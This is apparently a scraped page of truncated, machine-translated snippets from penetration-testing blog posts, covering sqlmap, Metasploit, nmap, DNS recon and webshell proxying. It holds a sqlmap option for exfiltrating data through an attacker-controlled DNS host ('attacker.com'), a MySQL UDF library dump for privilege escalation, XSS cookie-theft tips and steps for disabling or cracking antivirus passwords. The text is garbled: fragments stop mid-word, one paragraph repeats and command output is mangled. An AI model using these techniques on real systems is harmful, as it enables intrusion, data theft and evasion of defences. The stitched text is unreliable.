burp penetration testing

Query 1-10 column, up to 50 columns with--level increase--union-clos 6-9--union-charUnion queries use NULL by default, and in extreme cases null may be invalidated, at which point the value can be specified manually--union-char 123 "Web application needs to be analyzed in advance"--dns-domainScenario : An attacker controls a DNS server and uses this feature to increase data extraction rates--dns-domain attacker.com--second-orderThe result of a page injection, reflected from another page--second

1. IntroductionMetasploit provides a number of friendly, easy-to-use tools for penetration testers. Metasploit was originally created by HD Moore and was later acquired by Radid7, a nexpose vulnerability scanner. During penetration testing, some of the work that can be done by hand can be done by Metasploit.The Metasploit needs to be updated frequently and the la

SOAPAction header) Testing web Services is similar to testing common web applications, but browsers cannot interact with the server. if you have a sample request, you can use a tool or script language to fuzz the request and attack the server code. Web Application Security Client Security A common mistake is that programmers perform security checks on clients, such as javascript, to verify whether a mobi

attempt, of course, you can also brute force hack.16. Do not neglect XSS, do not neglect cookie,xss can steal cookies, but also a number of magical, learn to understand; Cookies can be forged, cookies can be injected, and cookies can be injected around the vast majority of firewalls.17. Usually do station more collect path Ah, source Ah, tools ah, enrich their "weapons" library; it is best to record their invasion steps, or after the reflection, I generally remember in txt, in addition to do ex

As more and more companies focus on data security when developing programs, they often encrypt database connections and encrypt some sensitive data in the database to prevent data from being easily stolen! Therefore, we often findSome encrypted connection strings are found during database connection. For those who have no adverse effects, it is possible thatWill be stopped here! However, we usually cannot meet this requirement, so we need to have some knowledge about reverse encryption and decry

the Kioptrix Web service, and we need to use instructions to get the returned information. Enter: And HEAD / HTTP 1.1 then press two times to enter to see the results of the output:　　 　　 Here the output of the content of the HTTP header, the above information indicates that the target machine ran apache/2.2.8, the system for the ubuntu;php version of Php/5.2.4-2.4.2 Using NCAT to get a flagThis process is similar to NC. Refer to the 4.1 content.4.3 using smbclient to get a flagTCP port 139 is a

further process the results.In addition, dig has some other valuable commands. List bind versions # dig +nocmd txt chaos VERSION.BIND @sn1.example.com +noall +answerThis command determines the BIND version information that is running on the server and is valuable for finding vulnerabilities. Reverse DNS LookupsResolves the IP address to a domain name, except Nslookup can also use the dig command to accomplish this task. # dig +nocmd +noall +answer -x 180.149.132.47

preceding content as waitalone. Reg, and double-click the import button to exit the trend-free antivirus software. 2. crack the password of the McAfee antivirus software The password for unlocking the McAfee antivirus software user interface is saved in the following registry path:HKEY_LOCAL_MACHINE \ SOFTWARE \ Mcafee \ protected topprotectionIn fact, the sub-key UIP is the password to be unlocked on the anti-virus software user interface. It is the MD5 ciphertext. You can directly decrypt

written by the other side, you can also use the above tools to identify whether the other side of the thinkphp and other frameworks. The enemy, Baizhanbudai.FB Netizen H4DE5 SupplementWell, let me add some of the tools I've used myself to:1, http://www.gpsspg.com/2, http://websth.com/3, http://www.showjigenzong.com/4, http://hd2001562.ourhost.cn/5, http://www.cz88.net/6, http://so.baiduyun.me/7, http://nmap.online-domain-tools.com/8, http://az0ne.lofter.com/post/31a51a_131960c This blog also ha

program has previously exposed the vulnerability. If it is written by the other side, you can also use the above tools to identify whether the other side of the thinkphp and other frameworks. The enemy, Baizhanbudai.?FB Netizen H4DE5 SupplementWell, let me add some of the tools I've used myself to:1,http://www.gpsspg.com/2,http://websth.com/3,http://www.showjigenzong.com/4,http://hd2001562.ourhost.cn/5,http://www.cz88.net/6,http://so.baiduyun.me/7,http://nmap.online-domain-tools.com/8,http://az

name.Please search the Apache server in the United States: App:apache Country:usPlease search the UK Sendmail server: App:sendmail country:ukFor a complete country code, see: Country code-Wikipedia IP AddressIP: Searches for a specified IP address.Google's public DNS server: ip:8.8.8.8 CIDRThe CIDR segment of the IP. Example: CIDR:8.8.8.8/244.web App Search Component NameApp: the component name.Ver: Component version.Apache httpd, version 2.2.16:app: "Apache httpd" ver: "2.2.16"Operating system

error, regardless of it, not a moment to slow down a bitA bunch of error messages, wait a while, the results come outNext look at the admin table what, 5 threads too fast, this time 3, continue to explodeThere are no known security devices or server performance issues, and 3 threads still have a connection reset.Burst 4 Columns with the following:Now, let's see what's in these columns.After a long wait, the data burst.You can see that the password is encrypted, 32-bit, should be MD5 encryption,

and recompile. and use Hex.hta to get 16 binary.1Mysql> Show variables like'%plugin%';2+---------------+-------------------------+3| variable_name | Value |4+---------------+-------------------------+5| Plugin_dir | /usr/lib64/mysql/plugin |6+---------------+-------------------------+7 1RowinchSet (0.00sec)8 9Mysql>Select*From func; #检查是否已经有人导出过了TenMysql>SelectUnhex ('Hexcode') into DumpFile'/usr/lib64/mysql/plugin/mysqludf.so'; OneQuery OK,1Row affected (0.01SEC) #需要有/usr/lib64/mysql/plugin/Wr

of other target networks to send packets.#nmap-SL 192.168.1.6 192.168.1.1The Idle scan is an ideal anonymous scanning technology that sends data to the host 192.168.1.1 via 192.168.1.6 in the target network to get 192.168.1.1 open portsThere is a need for other scanning techniques, such as FTP Bounce (FTP bounce), fragmentation scan (fragment scanning), IP protocol scan (IP protocol scanning), discussed above are several of the most important scanning methods.Nmap OS Detection (O)One of the mos

Amazing technology: using php socket5 proxy for Intranet penetration testing During penetration testing, we often encounter webshells, but webserver provides web services through web port ing on the Intranet. If you have protection software that causes abnormal server permissions, you cannot create socket proxy and po

In the spirit of good things we share the point of view, to share, I myself in the penetration testing process often used in some sites. If you have good suggestions and additions, you can leave a comment below.NavisecWebsite: http://navisec.itNetwork security personnel's Internet navigation, security personnel essential website. Website focused content, and not too much decoration, style is extremely conci

Penetration Testing Some ideas to share(1) Collection of website informationfirst determine the language in which the website is written. Or if there is a mix-up. This can be obtained by viewing the site source files, observing site links, capturing submission requests, and so on. (2) Crawling Site Directoryusing tools to crawl the site directory, you can assist in the previous step to make the results more

preinstalled in Kali Linux.2.1 Default OutputTake www.baidu.com domain name as an example, implement a fast IP address query. Enter the following command on the Kali Linux terminal:　　 　　# nslookup www.baidu.com 　　The output information is as follows:　　 Server 202.205.16.4 is the NDS server for this network, and UDP port 53 is the port used by DNS requests. According to the output shows that the Baidu alias is www.a.shifen.com, the query to two IP address description Baidu used more than one ser

LinkedInThe user names collected from LinkedIn will be of great use in subsequent tests. For example: social engineering attacks.MetagoofilMetagoofil is a tool that uses Google to gather information and currently supports the following types:1. Word2.Ppt3.Excel4. PdfCommands to use Metagoofil:#MetagoofilDemonstrate by an example:#metagoofil-D baidu.com-l 20-t doc,pdf-n 5-f Test.html-o testThrough this tool we can see very much information collected, such as user name, path information. We can u

Metasploit penetration testing of Ubuntu 12.04 (1) This article is mainly about entertaining exercises. Share the Attack Details, including some script files from various sources modified by the original author. The Penetration Process is not the focus. The biggest reason is that the second half of the article is still worth learning about persistence attacks. B